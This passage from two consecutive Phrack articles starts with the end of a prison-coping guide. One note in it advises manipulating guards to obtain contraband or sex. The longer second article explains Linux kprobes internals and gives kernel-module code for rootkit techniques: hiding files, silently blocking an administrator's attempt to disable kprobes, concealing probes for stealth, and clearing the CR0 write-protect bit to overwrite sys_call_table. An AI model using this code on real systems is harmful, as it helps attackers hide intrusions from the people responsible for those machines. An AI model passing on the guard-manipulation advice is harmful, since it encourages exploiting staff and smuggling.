negative things then your attitude will almost always be negative. This is 
what we want to avoid inside the prison walls. The more negative you are or
negativity that your around will likely cause you to do negative things.
This will most likely cause you to stay inside prison longer then you have 
to.

2. Visitation is most likely going to be the hardest part to get out of 
your mind. The reason for this is because you actually get to be with the 
people you love. Now depending on where you are at, you may have be 
separated by a wall with glass and will talk to them on a pay-phone type 
set-up. 

Note: Beware that most prisons record these types of conversations. You may
not get a prompt letting you know this but regardless be careful on what 
you say. A few tips on how to have a good visit from the family/friends: 

- Stay on a positive topic. You don't need to fight or argue with someone 
who takes the time to come and see you, and later on you'll most likely 
feel bad for doing this. This is what we don't want.

- Do not attempt to get your visitor to smuggle contraband. This can cause 
problems between you and the visitor, or you may end up getting them put in
prison if they do wish to bring the contraband.

- Take one visitation at a time. In other words do not go back to your cell
and ponder upon the visit. Doing so will cause you more stress and problems
than you should have to deal with.

3. You will be allowed to have pictures of your loved ones. This can be a 
good thing. Everyone wants to have pictures, but you should not keep them 
out because this causes you to pay more attention to the pictures instead 
of the things you really should be doing. You're just making your time 
harder then it should be by thinking about things that make you depressed.

Note: Also keeping your personal stuff out can end up getting it stolen by 
the other inmates. Stealing is frowned upon but is every common inside 
prisons.

4. When the guards tell you 'lights out' or bed time then this is what you 
should do. Do not stay up at night and ponder upon your misfortunes or your
family. The reason is this causes you to lose sleep and will make your 
daily schedule very hard to work with. You may be expected to work while 
you're locked up and if you're not fully functional then you will cause the
others to get angry and lash out against you.

5. Try to have as much fun as you can. This is hard but you have to try. 
Once you get comfortable and in transition to this new way of life then it 
will become easier. The main thing you should do to have fun is play games 
such as cards, dominoes. They may have a few board games also (I liked to 
play a good game of chess myself). Also when you're at the rec. yard (a 
place outside where you are allowed to Rome inside a certain area) play 
some sports like basket ball or football. There will be sports and people 
willing to play, this can also help you meet new people who can help 
distract you from your daily problems.

6. Like I mentioned earlier you can workout to keep you in shape and keep 
your mind off your problems. Find you a good workout routine and stick with
it. Working out is proved to higher your self-esteem and help with 
depression. You don't always have to wait until you go outside to workout, 
you can do this inside your cell whenever you find yourself thinking about 
negative things.

7. Establishing a relationship with a guard (depending on the sex the 
reader is) can also help you pass the time. If you have someone that is 
willing to help you in your time of need then this will bring your stress 
level to a lower term if not take it away completely.

Note: Establishing a relationship with a guard is not easy. They look at 
you like a criminal so your goal is to either manipulate them into 
believing that you're not or just simply show them the real you {nice, 
kindly person lol}. Like I've said this is a hard task but this in itself 
can keep your mind off the bullshit. Think of new ways to get through the 
guards personal defenses (you're hackers you should be good at this), and 
when you finally overcome them then you have all kinds of fun things to do 
depending on what your intentions are (contraband staff, or true 
relationship. Yes you may be able to fuck them). 


-[ 10 - Why I Wrote This


I wrote this article based on the assumption that many people would 
basically enjoy it, but also that it may help some people if they happen 
to go to prison. I was sentenced to 20 years for aggravated assault with a 
deadly weapon. It was my first time ever being locked up but I was one of 
the ones who took it as a challenge. While inside I've seen other first 
timers being treated in a way that no person should ever be treated. 

I made it inside the prison walls and now I am sharing with you ways for 
you to make it also, use this to your advantage this is for entertainment 
but also education.


                                          -TAp


PS: If you have any questions you would like for me to answer then please 
feel free to contact me.



--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x43, Phile #0x06 of 0x10

|=-----------------------------------------------------------------------=|
|=--------------=[ Kernel instrumentation using kprobes ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by ElfMaster ]=---------------------------=|
|=----------------------=[ elfmaster@phrack.org ]=-----------------------=|
|=-----------------------------------------------------------------------=|


1 - Introduction
	1.1 - Why write it?
	1.2 - About kprobes
	1.3 - Jprobe example
	1.4 - Kretprobe example & Return probe patching technique

2 - Kprobes implementation
	2.1 - Kprobe implementation
	2.2 - Jprobe implementation
	2.3 - File hiding with jprobes/kretprobes and modifying kernel .text
	2.4 - Kretprobe implementation
	2.5 - A quick stop into modifying read-only kernel segments
	2.6 - An idea for a kretprobe implementation for hackers

3 - Patch to unpatch W^X (mprotect/mmap restrictions)

4 - Notes on rootkit detection for kprobes

5 - Summing it all up.

6 - Greetz

7 - References and citations

8 - Code



---[ 1 - Introduction

----[ 1.1 - Why write it?

I will preface this by saying that kprobes can be used for anti-security
patching of the kernel. I would also like to point out that kprobes are not
the most efficient way to patch the kernel or write rootkits and backdoors
because they simply require more work -- extra innovation. 
So why write this? Because... we are hackers. Hackers should be aware of
any and all resources available to them -- some more auspicious than
others -- Nonetheless, kprobes are a sweet deal when you consider that they
are a native kernel API that are ripe for abuse, even without exceeding
their scope. Due to limitations discussed later on, kprobes require some
extra innovation when determining how to perform certain tasks such as file
hiding and applying other interesting patches that could subvert or even
harden the kernels integrity.


----[ 1.2 - About kprobes

It is with no doubt that the best introduction to kprobes is in the Linux 
kernel source documentation that contains kprobes.txt. Make sure to read
that when you get a chance. Kprobes are a debugging API native to the Linux
kernel that is based on the processors debug registers -- whatever the 
processor may be. We are going to assume x86, which at this time has the
most kprobe code developed.

--From kprobes.txt --

Kprobes enables you to dynamically break into any kernel routine and
collect debugging and performance information non-disruptively. You
can trap at almost any kernel code address, specifying a handler
routine to be invoked when the breakpoint is hit.

There are currently three types of probes: kprobes, jprobes, and
kretprobes (also called return probes).  A kprobe can be inserted
on virtually any instruction in the kernel.  A jprobe is inserted at
the entry to a kernel function, and provides convenient access to the
function's arguments.  A return probe fires when a specified function
returns.

--

Based on this definition one can imagine that this kprobes interface may be
used to instrument the kernel in some useful ways, both for security and
anti-security; That is what this paper is about. In the recent past I 	
implemented some relatively powerful and complex security patches 
using kprobes. That is not to say that other patching methods are
not still useful, but occasionally one may run into issues using traditional
methods such as kernel function trampolines which are not SMP safe due
to the non-atomic nature of swapping code in and out. kprobes are a native 
interface which is nice, but they still present some challenges due to
limitations we discuss throughout the paper. Kprobes can be used to patch
the kernel in some places, but cannot be used for everything. This a treatise
that can shed some light on when and where kprobes can be used to modify
the behavior of the kernel. Sometimes they must be used in conjunction with
another patching method. Before we move on I wanted to point out the following
few facts:

kprobes show up as being registered here:

/sys/kernel/debug/kprobes/list

And can be enabled or disabled by writing a 0 or a 1 here:

/sys/kernel/debug/kprobes/enabled

The kprobe source code is located in the following locations:
/usr/src/linux/kernel/kprobes.c
/usr/src/linux/arch/x86/kernel/kprobes.c 

Keep in mind that jprobes/kretprobes are 100% based on kprobes and
disabling kprobes like shown above will prevent any kretprobe/jprobe
code from working as well. 

Moving on...


----[ 1.3 - Jprobe example

In this paper we will be working primarily with jprobes and kretprobes.
As shown in the kprobe documentation already, there are several functions
available for registering and unregistering these probes.

Lets pretend for a moment that we are interested in sys_mprotect, and we want
to inspect any calls to it, and the args that are being passed. For this
we could register a jprobe for sys_mprotect. The following code outlines the
general idea here. And consider that because we are setting a jprobe on 
a syscall, we need to either declare our jprobe handler using 'asmlinkage'
magic, otherwise we must get our args directly from the registers. In our
example I will get the args directly from the registers just to show how
to obtain the registers for the current task.

-- jprobe example 1 --


NOTE: The jprobe data types will be explained in detail in 2.2 [Jprobe
implementation]

int n_sys_mprotect(unsigned long start, size_t len, long prot)
{
	struct pt_regs *regs = task_pt_regs(current);
	
	start = regs->bx;
	len = regs->cx;
	prot = regs->dx;

	printk("start: 0x%lx len: %u prot: 0x%lx\n", start, len, prot);
	jprobe_return();
	return 0;
}           

/*
	The following entry in struct jprobe is 'void *entry'
	and simply points to the jprobe function handler that will
	be executing when the probe is hit on the function entry
	point.
*/

static struct jprobe mprotect_jprobe = 
{
	.entry = (kprobe_opcode_t *)n_sys_mprotect  // function entry  
};

static int __init jprobe_init(void)
{
	/* kp.addr is kprobe_opcode_t *addr; from struct kprobe and */
	/* points to the probe point where the trap will occur. In */
	/* our case we are probing sys_mprotect */
	mprotect_jprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");
	
	if ((ret = register_jprobe(&mprotect_jprobe)) < 0)
	{
		printk("register_jprobe failed for sys_mprotect\n");
		return -1;
	}
	
	return 0;
}


int init_module(void)
{
	jprobe_init();
	return 0;
}

void exit_module(void)
{
	unregister_jprobe(&mprotect_jprobe);
}


In the above code, we register a jprobe for sys_mprotect. This means that
a breakpoint instruction is placed on the entry point of the function,
and as soon as it gets called a trap occurs and control is passed to our
n_sys_mprotect() jprobe handler. From this point we can analyze data such
as the arguments passed either in registers or on the stack, as well as any
kernel data structures. We can also modify kernel data structures, which 
is primarily what we rely on for our patches using kprobes. Any attempts
to modify the stack arguments or registers will be overriden as soon as
our handler function returns -- this is because kprobes saves the register
state and stack args prior to calling the handler, and restores these values
upon the jprobe_return(), at which point the real syscall or function will
execute and do its thing. We will get into much more detail on this topic
and how to actually modify stack arguments later on. 


----[ 1.4 - Kretprobe example and return probe patching technique

Moving on to kretprobes (Also known as return probes). Without kretprobes it
wouldn't be as easily possible to patch the kernel using kprobes, this is
because a kernel function that we set a jprobe on might re-modify a
kernel data structure that we modify, as soon as our jprobe handler returns.
If we apply a kretprobe into the situation we can modify that kernel data
structure after the real kernel function returns. Here is an example...
Lets say we want to modify the kernel data structure 'kstruct->x' (which is 
ficticious). We want to modify it, but do not know what value we want to 
apply to it until 'function_A' executes, but as soon as the real 'function_A' 
executes after our jprobe handler, it sets the value 'kstruct->x' to something. 
This is where kretprobes come into play. This is the approach we take, which
we can call the 'return probe patching' technique.

	1. [jprobe handler for function_A]    -> Determines the value that we want to set on kstruct->x
	2. [function_A] 		      -> Sets the value of kstruct->x to some value.
	3. [kretprobe handler for function_A] -> Sets the value of kstruct->x to value determined by jprobe handler.

So as you can see, with kretprobes we end up being able to set the final 
verdict on a value.

Here is a quick example of registering a kretprobe. We will use sys_mprotect
for this example as well.

The kretprobe data types will be explained in the section 2.4 [kretprobes
implementation].

static int mprotect_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
{
	printk("Original return address: 0x%lx\n", (unsigned long)ri->ret_addr);
	return 0;


}
static struct kretprobe mprotect_kretprobe =
{
	.handler = mprotect_ret_handler, // return probe handler
	.maxactive = NR_CPUS // max number of kretprobe instances
};


int init_module(void)
{
	mprotect_kretprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");
	register_kretprobe(&mprotect_kretprobe);
	
}

As you can see I utilize kallsyms_lookup_name(), but interestingly a probe
can be set on virtually any instruction within the kernel, whatever means
you use to get that location is up to you (I.E System.map).


So as you can see, the code is straight forward. From an internal point
of view-- by the time sys_mprotect returns, the address at the top of 
the stack (the ret address) has been modified to point to a function 
called kretprobe_trampoline() which in turn sets things up to call 
our mprotect_ret_handler() function where we can inspect and modify 
kernel data. No point in modifying the registers because they were 
all saved on the stack and will be reset as soon as our handler returns. 
More on this in the next section. The kretprobe trampoline function will be
explored in detail in 2.4 [Kretprobe implementation].


---[ 2 - Kprobes implementation

----[ 2.1 - Kprobe implementation

Firstly I want to make sure we are on the same page about what a basic
kprobe is, and the general idea of how it works.

-- Taken from kprobes.txt:

When a kprobe is registered, Kprobes makes a copy of the probed
instruction and replaces the first byte(s) of the probed instruction
with a breakpoint instruction (e.g., int3 on i386 and x86_64).

When a CPU hits the breakpoint instruction, a trap occurs, the CPU's
registers are saved, and control passes to Kprobes via the
notifier_call_chain mechanism.
Kprobes executes the "pre_handler" associated with the kprobe, passing 
the handler the addresses of the kprobe struct and the saved registers.
It would be simpler to single-step the actual instruction in place,
but then Kprobes would have to temporarily remove the breakpoint
instruction. This would open a small time window when another CPU
could sail right past the probepoint.

After the instruction is single-stepped, Kprobes executes the
"post_handler," if any, that is associated with the kprobe.
Execution then continues with the instruction following the probepoint.
Next, Kprobes single-steps its copy of the probed instruction.

--

So to clarify, when registering a typical kprobe a pre_handler should
always be assigned so that you can inspect data or do whatever you want
during that point. A post handler may or may not be assigned.

Since we are primarily using jprobes and kretprobes which are extensions
of the kprobe interface, I have chosen to primarily discuss their implementation
more so than a plain kprobe. All you need to know for now is that registering
a basic kprobe inserts a breakpoint instruction on the desired location, and
executes a pre and a post handler that you assign. As you will see in the jprobe and
kretprobe implementations which are implemented using a basic kprobe with
a pre and post handler, the pre and post handlers point to special kernel
functions [/usr/src/linux/arch/x86/kernel/kprobes.c] that act as a sort of
prologue/epilogue for the actual handler that executes the instructions.
More will be revealed in the following sections.


----[ 2.2 - Jprobe implementation

If we are aware of the internal implementation of jprobes and kretprobes
then we can utilize them better, and we could even patch the interface
itself to act more like we want it, but this defeats the purpose of this
paper which aims at patching the kernel using the kprobes interface as it
is, although we will explore some external modifications of kprobes later
on.

Firstly take a look at the following struct:

struct jprobe {
        struct kprobe kp;
        void *entry;    /* probe handling code to jump to */
};

When we call register_jprobe() it in turn calls register_jprobes(&jp, 1).
register_jprobes() is all about setting up the jprobe pre/post and entry
handler.

-- snippet from register_jprobes() in /usr/src/linux/kernel/kprobes.c --

		/* See how jprobes utilizes kprobes? It uses the */
		/* pre/post handler */
  		jp->kp.pre_handler = setjmp_pre_handler;     
                jp->kp.break_handler = longjmp_break_handler;
                ret = register_kprobe(&jp->kp);
--

The pre_handler is called before your function/entry handler and is responsible
for saving the contents of the stack, the registers, and sets the eip. In
normal circumstances the developer has no control over the pre/post
handler for jprobes because the kprobe pre and post handler entries within
struct kprobe do not point to your own custom handlers, but instead to
specialized handlers specifically for the jprobe prologue/epilogue.

        /* Called before addr is executed. */
        kprobe_pre_handler_t pre_handler;

        /* Called after addr is executed, unless... */
        kprobe_post_handler_t post_handler;

You could say that the execution of a jprobe looks like this:

	1. [jprobe pre_handler] Backup stack and register state
	2. [jprobe function handler] Do elite modifications to kernel
	3. [jprobe post_handler] Restore original stack and registers.

Lets take a peek at the pre_handler which backs up the stack and registers.

int __kprobes setjmp_pre_handler(struct kprobe *p, struct pt_regs *regs)
{
        struct jprobe *jp = container_of(p, struct jprobe, kp);
        unsigned long addr;
        struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();

        kcb->jprobe_saved_regs = *regs;
        kcb->jprobe_saved_sp = stack_addr(regs);
        addr = (unsigned long)(kcb->jprobe_saved_sp);

        /*
         * As Linus pointed out, gcc assumes that the callee
         * owns the argument space and could overwrite it, e.g.
         * tailcall optimization. So, to be absolutely safe
         * we also save and restore enough stack bytes to cover
         * the argument area.
         */
        memcpy(kcb->jprobes_stack, (kprobe_opcode_t *)addr,
               MIN_STACK_SIZE(addr));
        regs->flags &= ~X86_EFLAGS_IF;
        trace_hardirqs_off();
        regs->ip = (unsigned long)(jp->entry);
        return 1;
}

Pay close attention to the code comment above; Like with Chuck Noris... if Linus
says it, then it MUST be true! 

As you can see, the function gets the current stack location using the stack_addr()
macro, and then memcpy's it over to kcb->jprobes_stack which is a backup of the
stack to be restored in the post handler. The stack being restored prior to the
real function being called does impose some obvious restrictions, but that does
not mean that we can't manipulate the pointer values that are passed on the stack
which is something we take advantage of in section 2.3 (File hiding). After
the jprobe handler is finished, the jprobe post handler is called -- here
is the code.

int __kprobes longjmp_break_handler(struct kprobe *p, struct pt_regs *regs)
{
        struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();
        u8 *addr = (u8 *) (regs->ip - 1);
        struct jprobe *jp = container_of(p, struct jprobe, kp);

        if ((addr > (u8 *) jprobe_return) &&
            (addr < (u8 *) jprobe_return_end)) {
                if (stack_addr(regs) != kcb->jprobe_saved_sp) {
                        struct pt_regs *saved_regs =
&kcb->jprobe_saved_regs;
                        printk(KERN_ERR
                         "current sp %p does not match saved sp %p\n",
                               stack_addr(regs), kcb->jprobe_saved_sp);
                        printk(KERN_ERR "Saved registers for 
jprobe %p\n", jp);
                        show_registers(saved_regs);
                        printk(KERN_ERR "Current registers\n");
                        show_registers(regs);
                        BUG();
                }
                *regs = kcb->jprobe_saved_regs;
                memcpy((kprobe_opcode_t *)(kcb->jprobe_saved_sp),
                       kcb->jprobes_stack,
                       MIN_STACK_SIZE(kcb->jprobe_saved_sp));
                preempt_enable_no_resched();
                return 1;
        }
        return 0;
}


The code primarily restores the stack and re-enables preemption; probe 
handlers are run with preemption disabled.


----[ 2.3 - File hiding using jprobes/kretprobes

Lets consider a simple file hiding approach that consists using the 
dirent->d_name pointer in filldir64(). 


char *hidden_files[] = 
{
#define HIDDEN_FILES_MAX 3
	"test1",
	"test2",
	"test3"
};

struct getdents_callback64 {
        struct linux_dirent64 __user * current_dir;
        struct linux_dirent64 __user * previous;
        int count;
        int error;
};

/* Global data for kretprobe to act on */
static struct global_dentry_info
{
        unsigned long d_name_ptr;
        int bypass;
} g_dentry;

/* Our jprobe handler that globally saves the pointer value of dirent->d_name */
/* so that our kretprobe can modify that location */
static int j_filldir64(void * __buf, const char * name, int namlen, loff_t 
offset, u64 ino, unsigned int d_type)
{
        
        int found_hidden_file, i;
        struct linux_dirent64 __user *dirent;
        struct getdents_callback64 * buf = (struct getdents_callback64 *) __buf;
        dirent = buf->current_dir;
        int reclen = ROUND_UP64(NAME_OFFSET(dirent) + namlen + 1);
        
        /* Initialize custom stuff */
        g_dentry.bypass = 0;
        found_hidden_file = 0;
        
        for (i = 0; i < HIDDEN_FILES_MAX; i++)
                if (strcmp(hidden_files[i], name) == 0)
                        found_hidden_file++;
        if (!found_hidden_file)
                goto end;
        
        /* Create pointer to where we need to modify in dirent */
        /* since someone is trying to view a file we want hidden */
        g_dentry.d_name_ptr = (unsigned long)(unsigned char *)dirent->d_name;
        g_dentry.bypass++; // note that we want to bypass viewing this file
        
        end:
 	jprobe_return();
        return 0;
}

/* Our kretprobe handler, which we use to nullify the filename */
/* Remember the 'return probe technique'? Well this is it. */
static int filldir64_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        char *ptr, null = 0;
        /* Someone is looking at one of our hidden files */
        if (g_dentry.bypass)
        {
                /* Lets nullify the filename so it simply is invisible */
                ptr = (char *)g_dentry.d_name_ptr;
                copy_to_user((char *)ptr, &null, sizeof(char));
        }
}


The code above is quite adept at hiding files based on getdents64 being called	
but unfortunately 'ls' from GNU coreutils will call lstat64 for every d_name found,
and if some of the d_names start with a null byte then we will see an error returned
by lstat saying "Cannot access : : file not found". So if we are hiding 3 files, then
we will see that error message 3 times prior to the directory listing (which will not
show the hidden files). One of the primary limitations of kprobe patching
is that we cannot modify the return value of a function; the closest we can get is
setting up a return probe to modify data that the function may have operated on. 
There are some indirect methods of altering the return value at times, but after
following the code path for lstat64 I found no way to remedy the issue using kprobes.
Instead I found the not-so-elegant approach of redirecting the stderr to /dev/null
by setting a jprobe and a return probe on sys_write. Additionally, while modifying
sys_write, we might as well redirect any attempts to disable kprobes to /dev/null
as well. A super user can simply 'echo 0 > /sys/kernel/debug/kprobes/enabled' to
disable the kprobes interface (We don't want this). One of the parameters we will 
pass to insmod when installing our LKM will be the inode of the 'enabled' /sys entry. 
Below is the code for our modified sys_write.

asmlinkage static int j_sys_write(int fd, void *buf, unsigned int len)
{
        char *s = (char *)buf;
        char null = '\0';
        char devnull[] = "/dev/null";
        struct file *file;
        struct dentry *dentry = NULL;
        unsigned int ino;
        int ret;
 	char comm[255];
	
        stream_redirect = 0; // do we redirect to /dev/null?
 
	/* Make sure this is an ls program */
	/* otherwise we'd prevent other programs */
	/* From being able to send 'cannot access' */
	/* in their stderr stream, possibly */       
	get_task_comm(comm, current);
	if (strcmp(comm, "ls") != 0)
		goto out;

        /* check to see if this is an ls stat complaint, or ls -l weirdness */
	/* There are two separate calls to sys_write hence two strstr checks */
        if (strstr(s, "cannot access") || strstr(s, "ls:"))  
        {
                printk("Going to redirect\n");
                goto redirect;  
        }
        /* Check to see if they are trying to disable kprobes */
        /* with 'echo 0 > /sys/kernel/debug/kprobes/enabled' */
        file = fget(fd);
        if (!file)
                goto out;
        dentry = dget(file->f_dentry);
        if (!dentry)
                goto out;
        ino = dentry->d_inode->i_ino;
        dput(dentry);
        fput(file);
        if (ino != enabled_ino)
                goto out; 
        
        redirect:
        /* If we made it here, then we are doing a redirect to /dev/null */
        stream_redirect++;
        mm_segment_t o_fs = get_fs();
        set_fs(KERNEL_DS);

        n_sys_close(fd);
        fd = n_sys_open(devnull, O_RDWR, 0);
        
        set_fs(o_fs);
        global_fd = fd;

	out:
	jprobe_return();
	return 0;
}
/* Here is the return handler to close the fd to /dev/null. */
static int sys_write_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        if (stream_redirect)
        {
                n_sys_close(global_fd);
                stream_redirect = 0;
        }
        return 0;
}

We close the existing file descriptor and open a new one that will
use the same fd number. This redirection of stderr to /dev/null is only for the
current process. To understand it a bit more we can follow the code path of
do_sys_open(), I've added some extra comments:
 
long do_sys_open(int dfd, const char __user *filename, int flags, int mode)
{
        char *tmp = getname(filename);
        int fd = PTR_ERR(tmp);

        if (!IS_ERR(tmp)) {
                fd = get_unused_fd_flags(flags);
                if (fd >= 0) {
                        struct file *f = do_filp_open(dfd, tmp, flags,
			mode, 0);
                        if (IS_ERR(f)) {
                                put_unused_fd(fd);
                                fd = PTR_ERR(f);
                        } else {

				/* Notice fsnotify_open() */
                                fsnotify_open(f->f_path.dentry); 
				
				/* Associate fd with /dev/null */
                                fd_install(fd, f);
                                trace_do_sys_open(tmp, flags, mode);
                        }
                }
                putname(tmp);
        }
        return fd;
}

The new file descriptor is associated with its new file (struct
files_struct *) for the current task using fd_install().

void fd_install(unsigned int fd, struct file *file)
{
        struct files_struct *files = current->files; // <--  notice here
        struct fdtable *fdt;
        spin_lock(&files->file_lock);
        fdt = files_fdtable(files);     // <-- notice here
        BUG_ON(fdt->fd[fd] != NULL);
        rcu_assign_pointer(fdt->fd[fd], file);   // <-- notice here
        spin_unlock(&files->file_lock);
}


One important note to the reader is, /sys/kernel/debug/kprobes/list
the file which shows any registered kprobes. Simply use a redirect
technique like the one we used above to track open's to that file and
redirect any writes to stdout to /dev/null if the list contains a 
probe that you have registered. Very trivial, and absolutely necessary
to maintain a stealth presence.

As the topic of rootkits has become trite ...
I would like to introduce some other kprobe examples. Firstly 
let us discuss the Kretprobe implementation in detail. It will
give some more insight into the limitations of kprobes and also
expand your mind on how the kprobe implementation may be modified --
which is not covered in this paper.


----[ 2.4 - Kretprobe implementation

The kretprobe implementation is especially interesting. Primarily because
it is an innovative and nicely engineered chunk of code. Here is how it
works. 

-- From the kprobes.txt --

When you call register_kretprobe(), Kprobes establishes a kprobe at
the entry to the function.  When the probed function is called and this
probe is hit, Kprobes saves a copy of the return address, and replaces
the return address with the address of a "trampoline."  The trampoline
is an arbitrary piece of code -- typically just a nop instruction.
At boot time, Kprobes registers a kprobe at the trampoline.

The kretprobe implementation is really just a creative way of using
kprobes by registering them and assigning the trap handlers functions
that deal with modifying the return address.

-- From /usr/src/linux/kernel/kprobes.c --

int __kprobes register_kretprobe(struct kretprobe *rp)
{
        int ret = 0;
        struct kretprobe_instance *inst;
        int i;
        void *addr;
	
	... <code> ...
	
	rp->kp.pre_handler = pre_handler_kretprobe;
        rp->kp.post_handler = NULL;
        rp->kp.fault_handler = NULL;
        rp->kp.break_handler = NULL;

	... <code> ... 
}
	NOTE:
	Notice the rp->kp.pre_handler -- kp is struct kprobe 
	and the pre_handler is assigned pre_handler_kretprobe.

So when the return probe is hit, pre_handler_kretprobe() will call
arch_prepare_kretprobe() which saves the original return address and inserts
the new one:

void __kprobes arch_prepare_kretprobe(struct kretprobe_instance *ri,
                                      struct pt_regs *regs)
{
        unsigned long *sara = stack_addr(regs);

        ri->ret_addr = (kprobe_opcode_t *) *sara;

        /* Replace the return addr with trampoline addr */
        *sara = (unsigned long) &kretprobe_trampoline;
}

Notice the last line which sets the return address to the trampoline. The
trampoline is actually defined in an assembly stub, which for x86 looks
like this:

asm volatile (
                        ".global kretprobe_trampoline\n"
                        "kretprobe_trampoline: \n"
                        * Skip cs, ip, orig_ax and gs.
                         * trampoline_handler() will plug in these values
                         */
                        "       subl $16, %esp\n"
                        "       pushl %fs\n"
                        "       pushl %es\n"
                        "       pushl %ds\n"
                        "       pushl %eax\n"
                        "       pushl %ebp\n"
                        "       pushl %edi\n"
                        "       pushl %esi\n"
                        "       pushl %edx\n"
                        "       pushl %ecx\n"
                        "       pushl %ebx\n"
                        "       movl %esp, %eax\n"
                        "       call trampoline_handler\n"
                        /* Move flags to cs */
                        "       movl 56(%esp), %edx\n"
                        "       movl %edx, 52(%esp)\n"
                        /* Replace saved flags with true return address. */
                        "       movl %eax, 56(%esp)\n"
                        "       popl %ebx\n"
                        "       popl %ecx\n"
                        "       popl %edx\n"
                        "       popl %esi\n"
                        "       popl %edi\n"
                        "       popl %ebp\n"
                        "       popl %eax\n"
                        /* Skip ds, es, fs, gs, orig_ax and ip */
                        "       addl $24, %esp\n"
                        "       popf\n"
#endif
                        "       ret\n");
}

After the register state is backed up on the stack the stub calls
trampoline_handler() which essentially executes any return probe
handlers associated with the kretprobe for the given function. Looking at
the actual function gives some more insight.

static __used __kprobes void *trampoline_handler(struct pt_regs *regs)
{
        struct kretprobe_instance *ri = NULL;
        struct hlist_head *head, empty_rp;
        struct hlist_node *node, *tmp;
        unsigned long flags, orig_ret_address = 0;
        unsigned long trampoline_address = (unsigned
long)&kretprobe_trampoline;

        INIT_HLIST_HEAD(&empty_rp);
        kretprobe_hash_lock(current, &head, &flags);
        /* fixup registers */
#ifdef CONFIG_X86_64
        regs->cs = __KERNEL_CS;
#else
        regs->cs = __KERNEL_CS | get_kernel_rpl();
        regs->gs = 0;
#endif
        regs->ip = trampoline_address;
        regs->orig_ax = ~0UL;

        /*
         * It is possible to have multiple instances associated with a
         * given
         * task either because multiple functions in the call path have
         * return probes installed on them, and/or more than one
         * return probe was registered for a target function.
         *
         * We can handle this because:
         *     - instances are always pushed into the head of the list
         *     - when multiple return probes are registered for the same
         *       function, the (chronologically) first instance's ret_addr
         *       will be the real return address, and all the rest will
         *       point to kretprobe_trampoline.
         */
        hlist_for_each_entry_safe(ri, node, tmp, head, hlist) {
                if (ri->task != current)
                        /* another task is sharing our hash bucket */
                        continue;

                if (ri->rp && ri->rp->handler) {
                        __get_cpu_var(current_kprobe) = &ri->rp->kp;
                        get_kprobe_ctlblk()->kprobe_status =
KPROBE_HIT_ACTIVE;
                        ri->rp->handler(ri, regs);
                        __get_cpu_var(current_kprobe) = NULL;
                }

                orig_ret_address = (unsigned long)ri->ret_addr;
                recycle_rp_inst(ri, &empty_rp);

                if (orig_ret_address != trampoline_address)
                        /*
                         * This is the real return address. Any other
                         * instances associated with this task are for
                         * other calls deeper on the call stack
      			*/
                        break;
        }

        kretprobe_assert(ri, orig_ret_address, trampoline_address);

        kretprobe_hash_unlock(current, &flags);

        hlist_for_each_entry_safe(ri, node, tmp, &empty_rp, hlist) {
                hlist_del(&ri->hlist);
                kfree(ri);
        }
        return (void *)orig_ret_address;
}

The original return address value is returned, and then the
kretprobe_trampoline stub copies it onto the stack at the right location.
At which point all of the saved registers are pop'd and restored--resulting
in returning to the original calling function with the original return
value. I suppose it doesn't take an over active imagination to see that the
kretprobe_trampoline stub code can be modified to return a different
value. This could be done in several ways, however it would exceed
the scope of hacking purely with kprobes. The arch_prepare_kretprobe()
function would have to be patched (And it cannot be patched using a kprobe
sadly) this is because any functions with a __kprobe in the prototype 
cannot be patched using kprobe hooks themselves.

-- A simple patch within arch_prepare_kretprobe() 

*sara = (unsigned long)&kretprobe_trampoline; 

Could be changed to:

*sara = (unsigned long)&custom_asm_stub;

The problem is that arch_prepare_kretprobe() would have to be modified
using a technique alternate to kprobes, which is of course easy enough
but exceeds this papers scope. If you are interested in doing this the
next section will give you a trick that will be necessary in doing so.


----[ 2.5 - A quick stop into modifying read-only kernel segments

If you do feel interested in hijack arch_prepare_kretprobe()
using a function trampoline, do remember that modern intel CPU's
have the WRITE_PROTECT bit (cr0.wp) which prevents modifications to
read-only segments, so anytime you want to modify any data structure
that resides in .rodata you will need to use the function I provide
below to modify them. The following types of data structures often
exist in the kernels text segment:

1. void **sys_call_table
2. const struct file_operations <fs_fops_name>
3. const struct vm_ops <vma_vmops_name>
4. kernel functions

Data structures defined as 'const' will go into the .rodata section
which is at the end of the text segment, and the kernel code itself 
generally exist in the .text section of the text segment. Attempting
writes to these locations will cause kernel freezes/panics/oops.

Some people modify the page table entry data for read-only pages they
want to modify, but the following functions I have provided are much
simpler, and an example will be provided below.

/* FUNCTION TO DISABLE WRITE PROTECT BIT IN CPU */
static void disable_wp(void)
{
        unsigned int cr0_value;
        
        asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));
        
        /* Disable WP */
        cr0_value &= ~(1 << 16);
        
        asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));

}
        
/* FUNCTION TO RE-ENABLE WRITE PROTECT BIT IN CPU */
static void enable_wp(void)
{
        unsigned int cr0_value;

        asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));

        /* Enable WP */
        cr0_value |= (1 << 16);

        asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));

}

So if you wanted to modify a kernel function pointer that exists within
the text segment (If it is declared const) -- I.E the sys_call_table:

	disable_wp();
	sys_call_table[__NR_write] = (void *)n_sys_write;
	enable_wp(); 

Or assuming you have a function that hijacks arch_prepare_kretprobe() using
the method discussed here [3]

	disable_wp();
	hijack_arch_prepare_kretprobe();
	enable_wp();


You get the idea. But since we've fallen a bit off track lets move into
the next section which is actually more relative to the paper.


----[ 2.6 - An idea for a kretprobe implementation for hackers 


The primary restriction in patching the kernels should be obvious by now.
We CANNOT modify the return value in return probes (kretprobes). If someone
felt so inclined, they could (in an LKM) implement something very similar to
the kretprobe implementation. This would allow us to instrument the kernel
using kprobes and modify the return value -- therefore easily patching 
functions like filldir64 which would allow us to simply use our special
kretprobe implementation to 'return 0' if the 'char *d_name' matched a 
file we wanted to hide. 

If the reader studies /usr/src/linux/kernel/kprobes.c after reading the
above section on kretprobe implementation, it becomes apparent that a
more flexible kretprobe implementation could be designed. This is hardly
